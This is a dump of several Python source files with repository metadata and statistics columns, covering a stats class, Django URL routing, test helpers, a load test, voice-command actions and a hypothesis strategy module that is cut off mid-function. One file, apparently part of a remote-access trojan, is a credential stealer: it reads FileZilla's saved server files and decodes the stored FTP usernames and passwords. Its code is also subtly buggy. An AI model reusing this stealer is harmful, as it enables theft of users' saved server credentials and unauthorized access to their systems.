| 30.484848 | 123 | 0.695328 | 263 | 2,012 | 5.258555 | 0.501901 | 0.03543 | 0.052061 | 0.033261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022844 | 0.129722 | 2,012 | 65 | 124 | 30.953846 | 0.76699 | 0.423459 | 0 | 0 | 0 | 0 | 0.341571 | 0.045013 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
338af8622848bff11a1275eae70f3a73f237b0cc | 439 | py | Python | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | class Stats:
    writes: int
    reads: int
    accesses: int

    def __init__(self) -> None:
        self.reset()

    def reset(self) -> None:
        self.writes = 0
        self.reads = 0
        self.accesses = 0

    def add_reads(self, count: int = 1) -> None:
        self.reads += count
        self.accesses += count

    def add_writes(self, count: int = 1) -> None:
        self.writes += count
        self.accesses += count
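# Brief usage sketch (illustrative; not part of the original module):
if __name__ == "__main__":
    stats = Stats()
    stats.add_reads(2)
    stats.add_writes()
    print(stats.reads, stats.writes, stats.accesses)  # prints: 2 1 3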
| 20.904762 | 49 | 0.542141 | 55 | 439 | 4.218182 | 0.272727 | 0.137931 | 0.103448 | 0.112069 | 0.181034 | 0.181034 | 0 | 0 | 0 | 0 | 0 | 0.017301 | 0.341686 | 439 | 20 | 50 | 21.95 | 0.785467 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
338bdb61b810291631438e77fffbc7457c38058b | 1,421 | py | Python | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 375 | 2020-03-17T06:20:50.000Z | 2022-03-29T22:27:23.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 44 | 2020-04-06T22:37:59.000Z | 2020-11-15T15:53:39.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 173 | 2020-04-01T17:17:26.000Z | 2022-03-24T13:28:15.000Z | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
if not os.path.exists(FileZilla):
return []
RecentServersPath = FileZilla + 'recentservers.xml'
SiteManagerPath = FileZilla + 'sitemanager.xml'
# Read recent servers
if os.path.exists(RecentServersPath):
xmlDoc = minidom.parse(RecentServersPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
# Read sitemanager
if os.path.exists(SiteManagerPath):
xmlDoc = minidom.parse(SiteManagerPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
return Server | 33.046512 | 148 | 0.696692 | 144 | 1,421 | 6.875 | 0.319444 | 0.193939 | 0.121212 | 0.028283 | 0.567677 | 0.567677 | 0.567677 | 0.567677 | 0.567677 | 0.567677 | 0 | 0.016639 | 0.154117 | 1,421 | 43 | 149 | 33.046512 | 0.806988 | 0.056298 | 0 | 0.428571 | 0 | 0 | 0.123552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0.071429 | 0.107143 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
338c3eed58a47fa30a2aa03ae3da78bb3efa67b1 | 535 | py | Python | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | from django.conf.urls.defaults import *
urlpatterns = patterns('oldcontrib.tools.gallery.views',
    url(r'^add_to_gallery/$', view='add_to_gallery', name='add_to_gallery'),
    url(r'^remove_from_gallery/$', view='remove_from_gallery', name='remove_from_gallery'),
    url(r'^create_gallery/$', view='create_gallery', name='create_gallery'),
    url(r'^update_gallery_order/$', view='update_gallery_order', name='update_gallery_order'),
    url(r'^change_gallery_title/$', view='change_gallery_title', name='change_gallery_title'),
) | 59.444444 | 94 | 0.745794 | 74 | 535 | 5.027027 | 0.324324 | 0.053763 | 0.096774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080374 | 535 | 9 | 95 | 59.444444 | 0.756098 | 0 | 0 | 0 | 0 | 0 | 0.570896 | 0.182836 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
339039daaf7ffa710ba3dbd6f69316cd722f2b38 | 843 | py | Python | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 39 | 2015-04-09T12:55:25.000Z | 2022-01-09T17:56:39.000Z | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | null | null | null | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 13 | 2015-12-17T21:56:26.000Z | 2019-06-01T18:22:02.000Z | import unittest
from twisted.internet import reactor, task
class ReactorTestCase(unittest.TestCase):
    def __init__(self, *args, **kwargs):
        super(ReactorTestCase, self).__init__(*args, **kwargs)
        self.done = False

    def timeOutAfter(self, seconds):
        f = reactor.callLater(seconds, self.timedOut)
        f.start(seconds)

    def timedOut(self):
        self.done = True
        self.assertTrue(False, "test timed out!")
        print "Test Timed Out!"
        if reactor.running:
            reactor.stop()

    def reactorAssert(self, success, msg):
        if not self.done:
            self.assertTrue(success, msg)

    def reactorTestComplete(self):
        self.done = True
        self.assertTrue(True, "test complete!")
        print "Test Complete!"
        if reactor.running:
            reactor.stop()
| 28.1 | 62 | 0.619217 | 92 | 843 | 5.586957 | 0.423913 | 0.062257 | 0.046693 | 0.062257 | 0.22179 | 0.116732 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274021 | 843 | 29 | 63 | 29.068966 | 0.839869 | 0 | 0 | 0.25 | 0 | 0 | 0.068802 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | null | null | 0 | 0.083333 | null | null | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3397953b644d0f59b96f9efd7c056d0243abb45a | 380 | py | Python | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | from locust import HttpLocust, TaskSet, task
class WebsiteTasks(TaskSet):
    @task
    def bcrypt(self):
        headers = {"Content-type": "application/json"}
        payload = '{"message":"hello world"}'
        self.client.post("/SHOUTCLOUD", payload, headers=headers)


class WebsiteUser(HttpLocust):
    task_set = WebsiteTasks
    min_wait = 1
    max_wait = 1
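# Run sketch (the host is a placeholder; HttpLocust/TaskSet is the API of older
# Locust releases, matching the imports above):
#   locust -f run-shoutcloud-aws.py --host=https://<your-api-endpoint>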
| 27.142857 | 67 | 0.642105 | 41 | 380 | 5.878049 | 0.707317 | 0.091286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00692 | 0.239474 | 380 | 13 | 68 | 29.230769 | 0.82699 | 0 | 0 | 0 | 0 | 0 | 0.168421 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
3398cb226db154c17c5156d32cace490ac81678b | 198 | py | Python | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | colors = ['black', 'white']
sizes = ['S', 'M', 'L']
tshirts = [
    (color, size)
    for color in colors
    for size in sizes
]
print(f"Cartesian products from {colors} and {sizes}: {tshirts}")
| 18 | 65 | 0.59596 | 27 | 198 | 4.37037 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 198 | 10 | 66 | 19.8 | 0.766234 | 0 | 0 | 0 | 0 | 0 | 0.343434 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.125 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3399587139e4c6f0b9e4a5bc16f77ab6a41e223b | 807 | py | Python | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | 1 | 2019-01-17T21:03:51.000Z | 2019-01-17T21:03:51.000Z | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | # create this file
# rerouting all requests that have 'api' in the url to apps.core.urls
from django.conf.urls import url
from django.urls import path
from rest_framework import routers
from base.src import views
from base.src.views import InitViewSet
#from base.src.views import UploadFileForm
#upload stuff
from django.conf import settings
from django.conf.urls.static import static
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
#router.register(r'titles', TitlesViewSet, base_name='titles')
urlpatterns = [
    path(r'pawsc', InitViewSet.as_view()),
    path(r'pawsc/upload', views.simple_upload, name='simple_upload'),
    path(r'pawsc/home', views.home, name='home')
]
urlpatterns += router.urls
| 26.9 | 79 | 0.759603 | 116 | 807 | 5.241379 | 0.439655 | 0.065789 | 0.069079 | 0.059211 | 0.072368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130112 | 807 | 29 | 80 | 27.827586 | 0.866097 | 0.257745 | 0 | 0 | 0 | 0 | 0.092749 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4375 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
339e1f9b6047c43589a665151b5f5b6446ffe99f | 1,407 | py | Python | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from django.db.models import Q
import django_filters
from core.models import ApplicationVersionLicense as ImageVersionLicense
from api.v2.serializers.details import ImageVersionLicenseSerializer
from api.v2.views.base import AuthModelViewSet
class VersionFilter(django_filters.FilterSet):
    version_id = django_filters.CharFilter(method='filter_by_uuid')
    created_by = django_filters.CharFilter(method='filter_owner')

    def filter_owner(self, queryset, name, value):
        return queryset.filter(
            Q(image_version__created_by__username=value) |
            Q(image_version__application__created_by__username=value)
        )

    def filter_by_uuid(self, queryset, name, value):
        # NOTE: Remove this *HACK* once django_filters supports UUID as PK fields
        return queryset.filter(image_version__id=value)

    class Meta:
        model = ImageVersionLicense
        fields = ['version_id', 'created_by']


class ImageVersionLicenseViewSet(AuthModelViewSet):
    """
    API endpoint that allows version tags to be viewed
    """
    queryset = ImageVersionLicense.objects.none()
    serializer_class = ImageVersionLicenseSerializer
    filter_class = VersionFilter

    def get_queryset(self):
        """
        Filter out tags for deleted versions
        """
        return ImageVersionLicense.objects.filter(
            image_version__created_by=self.request.user)
| 33.5 | 81 | 0.734186 | 156 | 1,407 | 6.371795 | 0.435897 | 0.065392 | 0.018109 | 0.05835 | 0.070423 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001767 | 0.195451 | 1,407 | 41 | 82 | 34.317073 | 0.876325 | 0.113717 | 0 | 0 | 0 | 0 | 0.038079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.2 | 0.08 | 0.76 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
339ef85148fe55aaa28cf0f86e5f3b80b5277dee | 1,964 | py | Python | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# C++ version Copyright (c) 2006-2011 Erin Catto http://www.box2d.org
# Python port by Ken Lauer / http://pybox2d.googlecode.com
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
from __future__ import absolute_import
__all__ = ('Joint', 'DistanceJoint', 'RevoluteJoint', 'FrictionJoint',
           'PrismaticJoint', 'WeldJoint', 'RopeJoint', 'WheelJoint',
           'MouseJoint', 'PulleyJoint', 'GearJoint',
           'INACTIVE_LIMIT', 'AT_LOWER_LIMIT', 'AT_UPPER_LIMIT', 'EQUAL_LIMITS',
           'ALLOWED_STRETCH')
__version__ = "$Revision: 352 $"
__date__ = "$Date: 2011-07-14 20:14:23 -0400 (Thu, 14 Jul 2011) $"
# $Source$
from .joint import (INACTIVE_LIMIT, AT_LOWER_LIMIT, AT_UPPER_LIMIT, EQUAL_LIMITS, ALLOWED_STRETCH)
from .joint import Joint
from .distance import DistanceJoint
from .revolute import RevoluteJoint
from .friction import FrictionJoint
from .prismatic import PrismaticJoint
from .weld import WeldJoint
from .rope import RopeJoint
from .wheel import WheelJoint
from .mouse import MouseJoint
from .pulley import PulleyJoint
from .gear import GearJoint
| 42.695652 | 99 | 0.735234 | 266 | 1,964 | 5.31203 | 0.541353 | 0.042463 | 0.019816 | 0.032555 | 0.087757 | 0.087757 | 0.087757 | 0.087757 | 0.087757 | 0.087757 | 0 | 0.025593 | 0.184318 | 1,964 | 45 | 100 | 43.644444 | 0.856429 | 0.5 | 0 | 0 | 0 | 0.05 | 0.277293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.65 | 0 | 0.65 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
33a5d6a0778311e0740b6ce7a927d2f68fa7baf5 | 380 | py | Python | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 5 | 2020-02-16T13:39:10.000Z | 2020-02-19T19:29:56.000Z | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | null | null | null | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 2 | 2020-02-19T15:10:44.000Z | 2020-02-19T16:55:38.000Z | from talon import Context, Module
ctx = Context()
mod = Module()
mod.tag("code_data_null", desc="Tag for enabling commands relating to null")
@mod.action_class
class Actions:
    def code_insert_null():
        """Inserts null"""

    def code_insert_is_null():
        """Inserts check for null"""

    def code_insert_is_not_null():
        """Inserts check for non-null"""
| 20 | 76 | 0.665789 | 53 | 380 | 4.54717 | 0.509434 | 0.087137 | 0.161826 | 0.141079 | 0.157676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 380 | 18 | 77 | 21.111111 | 0.803333 | 0.163158 | 0 | 0 | 0 | 0 | 0.18543 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
33a772f892d4ed50cf326d5af75052977fcc4c7b | 695 | py | Python | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | null | null | null | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | 81 | 2022-03-04T23:46:02.000Z | 2022-03-19T13:06:46.000Z | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | null | null | null | from body.tests.login_test_case import LoginTestCase
from body.tests.model_helpers import create_ledger_entry, create_medicine
from freezegun import freeze_time
from django.utils.timezone import make_aware, datetime
@freeze_time(make_aware(datetime(2022, 3, 1)))
class MedicineTests(LoginTestCase):
    def test_ledger_recalculates(self):
        """
        Recalculating the current balance of a medicine correctly uses ledger entries to do so.
        """
        medicine = create_medicine(self.user)
        create_ledger_entry(medicine, 4)
        create_ledger_entry(medicine, -1)
        medicine.recalculate_balance_from_ledger()
        self.assertEqual(medicine.current_balance, 3)
| 38.611111 | 95 | 0.755396 | 88 | 695 | 5.727273 | 0.534091 | 0.071429 | 0.10119 | 0.099206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015679 | 0.174101 | 695 | 17 | 96 | 40.882353 | 0.862369 | 0.12518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
33a9396a5c748b360eebc18de6c808b8faa43521 | 20,818 | py | Python | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 13 | 2021-05-26T21:32:26.000Z | 2022-03-15T17:48:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 20 | 2021-05-26T20:17:15.000Z | 2022-02-27T20:04:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 2 | 2021-10-05T16:00:47.000Z | 2021-10-08T01:30:06.000Z | """This module contains functions to generate strategies from annotations."""
from __future__ import annotations
import collections
import inspect
import sys
from itertools import chain
from itertools import combinations
from typing import Any
from typing import Callable
from typing import Iterable
from typing import Sequence
import numpy as np
import pytest
from hypothesis import given
from hypothesis.extra.numpy import complex_number_dtypes
from hypothesis.extra.numpy import floating_dtypes
from hypothesis.extra.numpy import from_dtype
from hypothesis.strategies import booleans
from hypothesis.strategies import complex_numbers
from hypothesis.strategies import data
from hypothesis.strategies import dictionaries
from hypothesis.strategies import floats
from hypothesis.strategies import integers
from hypothesis.strategies import iterables
from hypothesis.strategies import just
from hypothesis.strategies import lists
from hypothesis.strategies import one_of
from hypothesis.strategies import SearchStrategy
from hypothesis.strategies import sets
from hypothesis.strategies import text
from hypothesis.strategies import tuples
from bqskit.utils.test.strategies import circuit_location_likes
from bqskit.utils.test.strategies import circuit_locations
from bqskit.utils.test.strategies import circuit_points
from bqskit.utils.test.strategies import circuit_regions
from bqskit.utils.test.strategies import circuits
from bqskit.utils.test.strategies import cycle_intervals
from bqskit.utils.test.strategies import everything_except
from bqskit.utils.test.strategies import gates
from bqskit.utils.test.strategies import operations
from bqskit.utils.test.strategies import unitaries
from bqskit.utils.test.strategies import unitary_likes
def _powerset(iterable: Iterable[Any]) -> Iterable[Any]:
"""
Calculate the powerset of an iterable.
Examples:
>>> list(powerset([1,2,3]))
... [() (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)]
References:
https://stackoverflow.com/questions/18035595/powersets-in-python-using-
itertools.
"""
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)))
def _split_generic_arguments(args: str) -> list[str]:
"""Split a generic's type arguments up."""
comma_indices = []
num_open_brackets = 0
for i, char in enumerate(args):
if char == '[':
num_open_brackets += 1
elif char == ']':
num_open_brackets -= 1
elif char == ',' and num_open_brackets == 0:
comma_indices.append(i)
if len(comma_indices) == 0:
return [args]
to_return: list[str] = []
last_index = 0
for comma_index in comma_indices:
to_return.append(args[last_index: comma_index])
last_index = comma_index + 1
to_return.append(args[last_index:])
return to_return
def type_annotation_to_valid_strategy(annotation: str) -> SearchStrategy[Any]:
"""Convert a type annotation into a hypothesis strategy."""
strategies: list[SearchStrategy[Any]] = []
annotation = annotation.replace('RealVector', 'Sequence[float]')
for type_str in annotation.split('|'):
type_str = type_str.strip()
if type_str == 'None':
strategies.append(just(None))
elif type_str == 'int':
strategies.append(integers())
elif type_str == 'float':
strategies.append(floats())
strategies.append(floating_dtypes().flatmap(from_dtype))
elif type_str == 'complex':
strategies.append(complex_numbers())
strategies.append(complex_number_dtypes().flatmap(from_dtype))
elif type_str == 'bool':
strategies.append(booleans())
elif type_str == 'str':
strategies.append(text())
elif type_str == 'Any':
strategies.append(just(None))
elif type_str.lower().startswith('tuple'):
inner_strategies = []
for arg in _split_generic_arguments(type_str[6:-1]):
inner_strategies.append(type_annotation_to_valid_strategy(arg))
strategies.append(tuples(*inner_strategies))
elif type_str.lower().startswith('dict'):
args = _split_generic_arguments(type_str[5:-1])
key_strat = type_annotation_to_valid_strategy(args[0])
val_strat = type_annotation_to_valid_strategy(args[1])
strategies.append(dictionaries(key_strat, val_strat))
elif type_str.lower().startswith('mapping'):
args = _split_generic_arguments(type_str[8:-1])
key_strat = type_annotation_to_valid_strategy(args[0])
val_strat = type_annotation_to_valid_strategy(args[1])
strategies.append(dictionaries(key_strat, val_strat))
elif type_str.lower().startswith('list'):
arg_strat = type_annotation_to_valid_strategy(type_str[5:-1])
strategies.append(lists(arg_strat))
elif type_str.lower().startswith('set'):
arg_strat = type_annotation_to_valid_strategy(type_str[4:-1])
strategies.append(sets(arg_strat))
elif type_str.lower().startswith('sequence'):
arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
strategies.append(lists(arg_strat))
elif type_str.lower().startswith('iterable'):
arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
strategies.append(iterables(arg_strat))
elif type_str.lower().startswith('intervallike'):
strat = type_annotation_to_valid_strategy('Tuple[int, int]')
strategies.append(strat)
strategies.append(cycle_intervals())
elif type_str.lower().startswith('cycleinterval'):
strategies.append(cycle_intervals())
elif type_str.lower().startswith('circuitpointlike'):
strat = type_annotation_to_valid_strategy('Tuple[int, int]')
strategies.append(strat)
strategies.append(circuit_points())
elif type_str.lower().startswith('circuitpoint'):
strategies.append(circuit_points())
elif type_str.lower().startswith('circuitregionlike'):
strat = type_annotation_to_valid_strategy('dict[int, IntervalLike]')
strategies.append(strat)
strategies.append(circuit_regions())
elif type_str.lower().startswith('circuitregion'):
strategies.append(circuit_regions())
elif type_str.lower().startswith('unitarylike'):
strategies.append(unitary_likes())
elif type_str.lower().startswith('unitarymatrix'):
strategies.append(unitaries())
elif type_str.lower().startswith('gate'):
strategies.append(gates())
elif type_str.lower().startswith('operation'):
strategies.append(operations())
elif type_str.lower().startswith('circuitlocationlike'):
strategies.append(circuit_locations())
elif type_str.lower().startswith('circuitlocation'):
strategies.append(circuit_location_likes())
elif type_str.lower().startswith('circuit'):
strategies.append(circuits(max_gates=1))
else:
raise ValueError(f'Cannot generate strategy for type: {type_str}')
return one_of(strategies)
def type_annotation_to_invalid_strategy(annotation: str) -> SearchStrategy[Any]:
"""Convert a type annotation into an invalid hypothesis strategy."""
strategies: list[SearchStrategy[Any]] = []
types_to_avoid: set[type] = set()
